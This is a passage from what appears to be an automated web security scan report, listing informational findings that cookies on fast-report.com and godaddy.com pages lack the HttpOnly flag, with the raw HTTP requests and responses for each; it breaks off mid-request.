Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.189. http://www.fast-report.com/en/download/fastreport.net-download.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/download/fastreport.net-download.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A30; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.190. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.191. http://www.fast-report.com/en/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:31 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A34; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.192. http://www.fast-report.com/en/products/FastReport.Net.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/products/FastReport.Net.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/products/FastReport.Net.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A29; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 19540

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
15.193. http://www.fast-report.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A11

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:18 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18; expires=Tue, 20-Mar-2012 11:41:18 GMT; path=/
Vary: Accept-Encoding
Content-Type: image/x-icon
Content-Length: 1406

..............h.......(....... ...........@...........................rr}.zz..........fff.............................ff..........WW..........BB..kk......pp..................99..??......ZZ......``....
...[SNIP]...
15.194. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
15.195. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
15.196. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
15.197. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
15.198. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
15.199. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
15.200. http://www.soundingsonline.com/archives/'+NSFTW+'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
